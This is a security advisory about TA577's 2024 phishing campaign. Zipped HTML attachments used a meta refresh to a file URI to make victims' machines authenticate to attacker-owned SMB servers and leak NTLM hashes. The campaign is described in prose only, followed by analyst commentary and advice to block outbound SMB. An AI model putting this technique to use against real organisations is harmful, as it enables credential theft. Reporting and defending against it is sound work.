Hundreds of Orgs Targeted With Emails Aimed at Stealing NTLM Authentication Hashes


A threat actor specializing in establishing initial access to target organizations’ computer systems and networks is using booby-trapped email attachments to steal employees’ NTLM hashes. NT LAN Manager (NTLM) hashes contain users’ (encoded) passwords. “User authentication in Windows is used to prove to a remote system that a user is who they say they are. NTLM does this by proving knowledge of a password during a challenge and response exchange without revealing the password to anyone,” Microsoft said in a recent post that announced their goal to deprecate NTLM use in favor of Kerberos – a more modern, extensible, and secure authentication protocol. “These hashes could be exploited for password cracking or facilitate ‘Pass-The-Hash’ attacks using other vulnerabilities within the targeted organization to move laterally within an impacted environment,” Proofpoint researchers have noted. (Though cracking the password is not enough to gain access to accounts with multi-factor authentication switched on).

According to the researchers, in late February 2024 the threat actor (marked as TA577) sent out tens of thousands of emails targeting employees of hundreds of organizations around the world. The emails looked like they were replies to previous emails, and directed the potential victims to download and open the attached ZIP archive file. “When opened, the HTML file triggered a system connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. That is, the file would automatically contact an external SMB resource owned by the threat actor,” the researchers explained. No actual malware was used in the attack – the attackers only wanted to capture NTLMv2 challenge/response pairs from the SMB server to steal NTLM hashes. “Any allowed connection attempt to these SMB servers could potentially compromise NTLM hashes, along with revealing other sensitive information such as computer names, domain names, and usernames in clear text,” they noted. TA577 is known for delivering malware loader – QBot (Qakbot) in the past and, more recently, Pikabot – but this is the first time they’ve been spotted trying to steal NTLM credentials.

Security Officer Comments:
TA577 is known for infecting systems with trojan malware in the past but this campaign to steal NTLM hashes indicates they may be looking for new methods to compromise business systems. Similarly to previous campaigns, their initial access strategy is highlighted by a Malvertising or Malspam campaign via email and occasionally through search ads. They often use TTPs such as Spearphishing for these campaigns. In this instance, by masquerading as email replies to previously-sent emails. The lack of use of a trojan during this campaign may be evidence they are using cyber espionage to scope out viable targets while testing new delivery methods by casting out a wide net.

Suggested Corrections:
Researchers noted, “an increase in multiple threat actors abusing file scheme URIs to direct recipients to external file shares such as SMB and WebDAV to access remote content for malware delivery.” To foil those attempts, organizations should block outbound SMB connections, they advised. “Disabling guest access to SMB does not mitigate the attack, since the file must attempt to authenticate to the external SMB server to determine if it should use guest access,” Researchers added.